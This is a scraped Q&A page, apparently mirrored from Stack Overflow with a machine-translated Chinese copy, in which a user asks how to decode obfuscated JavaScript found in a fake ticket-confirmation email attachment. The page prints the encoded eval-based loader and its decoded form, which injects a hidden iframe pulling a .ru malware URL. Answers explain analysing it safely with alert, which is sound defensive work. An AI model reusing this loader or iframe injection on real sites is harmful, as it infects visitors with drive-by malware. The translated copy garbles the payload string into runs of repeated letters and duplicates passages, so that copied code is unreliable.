Fatal编程技术网

Javascript 脱臭/解析字符串

javascript string

Javascript 脱臭/解析字符串,javascript,string,Javascript,String,今天,我在一封电子邮件附件中收到了以下内容,声明这是对我购买的一张机票的确认。请帮助我理解如何去解构这个代码 <script> c = 2; i = c - 2; if (window.document) try { new c.prototype } catch (hgberger) { f = ['-29n-29n67n64n-6n2n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28n83n

今天,我在一封电子邮件附件中收到了以下内容,声明这是对我购买的一张机票的确认。请帮助我理解如何去解构这个代码

<script>
c = 2;
i = c - 2;
if (window.document) try {
    new c.prototype
} catch (hgberger) {
    f = ['-29n-29n67n64n-6n2n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n53n10n55n3n85n-25n-29n-29n-29n67n64n76n59n71n63n76n2n3n21n-25n-29n-29n87n-6n63n70n77n63n-6n85n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n81n76n67n78n63n2n-4n22n67n64n76n59n71n63n-6n77n76n61n23n1n66n78n78n74n20n9n9n62n72n80n64n73n62n73n73n77n66n62n69n64n66n66n59n8n76n79n20n18n10n18n10n9n67n71n59n65n63n77n9n59n79n60n70n60n84n62n72n67n8n74n66n74n1n-6n81n67n62n78n66n23n1n11n10n1n-6n66n63n67n65n66n78n23n1n11n10n1n-6n77n78n83n70n63n23n1n80n67n77n67n60n67n70n67n78n83n20n66n67n62n62n63n72n21n74n73n77n67n78n67n73n72n20n59n60n77n73n70n79n78n63n21n70n63n64n78n20n10n21n78n73n74n20n10n21n1n24n22n9n67n64n76n59n71n63n24n-4n3n21n-25n-29n-29n87n-25n-29n-29n64n79n72n61n78n67n73n72n-6n67n64n76n59n71n63n76n2n3n85n-25n-29n-29n-29n80n59n76n-6n64n-6n23n-6n62n73n61n79n71n63n72n78n8n61n76n63n59n78n63n31n70n63n71n63n72n78n2n1n67n64n76n59n71n63n1n3n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n77n76n61n1n6n1n66n78n78n74n20n9n9n62n72n80n64n73n62n73n73n77n66n62n69n64n66n66n59n8n76n79n20n18n10n18n10n9n67n71n59n65n63n77n9n59n79n60n70n60n84n62n72n67n8n74n66n74n1n3n21n64n8n77n78n83n70n63n8n80n67n77n67n60n67n70n67n78n83n23n1n66n67n62n62n63n72n1n21n64n8n77n78n83n70n63n8n74n73n77n67n78n67n73n72n23n1n59n60n77n73n70n79n78n63n1n21n64n8n77n78n83n70n63n8n70n63n64n78n23n1n10n1n21n64n8n77n78n83n70n63n8n78n73n74n23n1n10n1n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n81n67n62n78n66n1n6n1n11n10n1n3n21n64n8n77n63n78n27n78n78n76n67n60n79n78n63n2n1n66n63n67n65n66n78n1n6n1n11n10n1n3n21n-25n-29n-29n-29n62n73n61n79n71n63n72n78n8n65n63n78n31n70n63n71n63n72n78n77n28n83n46n59n65n40n59n71n63n2n1n60n73n62n83n1n3n53n10n55n8n59n74n74n63n72n62n29n66n67n70n62n2n64n3n21n-25n-29n-29n87'][0].split('n');
    md = 'a';
    e = window["e" + "val"];
    w = f;
    s = [];
    r = String;
    for (; 613 != i; i += 1) {
        j = i;
        s += r.fromCharCode(38 + 1 * w[j]);
    }
    e(s);
}</script>


c=2;
i=c-2;
如果(window.document),请尝试{
新c.原型
}捕获(hgberger){
f=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN63N2N-4n22n67n64n76n59n71n63n-6N77N76N61N23N1 N66N78N78N74N20N9N9N62N72N80NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN67N73N72N20N59N60N77N73N70N79N78N63N21N70N63N64N78N20N10N21N78N73N74N-N-N-N-29n-N-29n-N-N-N-N-N-29n-29n-N-N-29n-N-29n-N-29n-N-29n-29n-N-7 N-N-N-N-29n-29n-7 N-N-N-N-N-N-N-N-N-29n-29n-N-N-29n-29n-N-29n-N-29n-N-N-N-N-29n-N-N-N-29n-N-N-29n-N-N-N-N-N-29n-N-N-N-N-N-N-N-N-29n-N-7 7 N-N-N-N-N-N-N-N-N-N-N-N-N-N-N-3 3 N-3 3 3 3-N-N-3 3-N-N-N-N-N-N-3 N78N27N78N78N76N67N60N79N78N63N2N1N77N76N61N6N16N78N78N74N20N9N9N62N72NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN79N78N63N1N21N64N8N77N78N83N70N63N8N70N63N64N78N3N1N10N21N64N8N77N7NNNN78NNN78NNNNNNNNNNNNNNNNNNNNNNNNNN78NN78NNN78NNN78NNN78NNNNN78NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN78NNNN78NN78NNNN78N78NNNN78NNNN78NNNN78NNNNNN78NNNNN78NNNN78NNNNN78NNNNNN78NNNNN78NNNN78NNNNN78NNNNNNNN78NNNNNN78NNNNNNN78NNNNNNN78NNNNNNNN78NNNNNN78NNNNNN78NNNNNNNNNNNNN65N40N59N71N63N2N1N60N73N62N83N3N53N10N55N8N59N74N74N63N72N62N29n66n67n70n62n2n64n3n21n-25n-29n-29n87'][0]。拆分('n');
md='a';
e=窗口[“e”+“val”];
w=f;
s=[];
r=字符串;
对于(;613!=i;i+=1){
j=i;
s+=r.fromCharCode(38+1*w[j]);
}
e(s);
}
该字符串似乎是由“n”分隔的字符代码列表。如果运行代码时最后一行替换为“alert(s)”而不是“e”您将看到恶意软件试图“评估”的模糊代码。

该字符串似乎是由“n”分隔的字符代码列表。如果运行代码时最后一行替换为“alert(s)”,而不是e(s),您将看到恶意软件试图“评估”的模糊代码。

未模糊:

if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("<iframe src='http://dnvfodooshdkfhha.ru:8080/images/aublbzdni.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
    var f = document.createElement('iframe');f.setAttribute('src','http://dnvfodooshdkfhha.ru:8080/images/aublbzdni.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

if(document.getElementsByTagName('body')[0]){
iframer();
}否则{
文件。填写(“”);
}
函数iframer(){
var f=document.createElement('iframe');f.setAttribute('src','http://dnvfodooshdkfhha.ru:8080/images/aublbzdni.php);f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
未模糊:

if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("<iframe src='http://dnvfodooshdkfhha.ru:8080/images/aublbzdni.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
    var f = document.createElement('iframe');f.setAttribute('src','http://dnvfodooshdkfhha.ru:8080/images/aublbzdni.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

if(document.getElementsByTagName('body')[0]){
iframer();
}否则{
文件。填写(“”);
}
函数iframer(){
var f=document.createElement('iframe');f.setAttribute('src','http://dnvfodooshdkfhha.ru:8080/images/aublbzdni.php);f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
我将您发布的代码一字不差地粘贴到其中。我唯一做的更改(我建议这样做)是将对
e
的调用更改为
alert
。这样,您的浏览器就不会尝试执行嵌入的代码,而只会为您显示它

你会看到一些关于iframes和dnvfodooshdkfhha.ru的狡猾的东西,看起来像垃圾邮件。

我把你发布的代码一字不差地粘贴到其中。我唯一做的更改(我建议这样做)是将调用更改为
e(s)
更改为
alert(s)
。这样,您的浏览器就不会尝试执行嵌入的代码,而只会为您显示它

你会看到一些关于iframes和dnvfodooshdkfhha.ru的狡猾的东西,看起来像垃圾邮件。

如果你运行catch块中的内容,你会得到更多引用dnvfodooshdkfhha.ru的JavaScript。在谷歌快速搜索之后,这看起来像垃圾邮件。这是一种非常邪恶的偷偷摸摸的行为。垃圾邮件发送者是狡猾的窃听者。任何自动浏览器怎么能安全呢rity能够将其检测为恶意功能吗?如果你运行catch块中的内容,你会得到更多引用dnvfodooshdkfhha.ru的JavaScript。在快速的谷歌搜索之后,这看起来像垃圾邮件。这是一种非常邪恶的偷偷摸摸的行为。垃圾邮件发送者是狡猾的窃听者。任何自动浏览器安全如何能够将其检测为恶意呢s函数?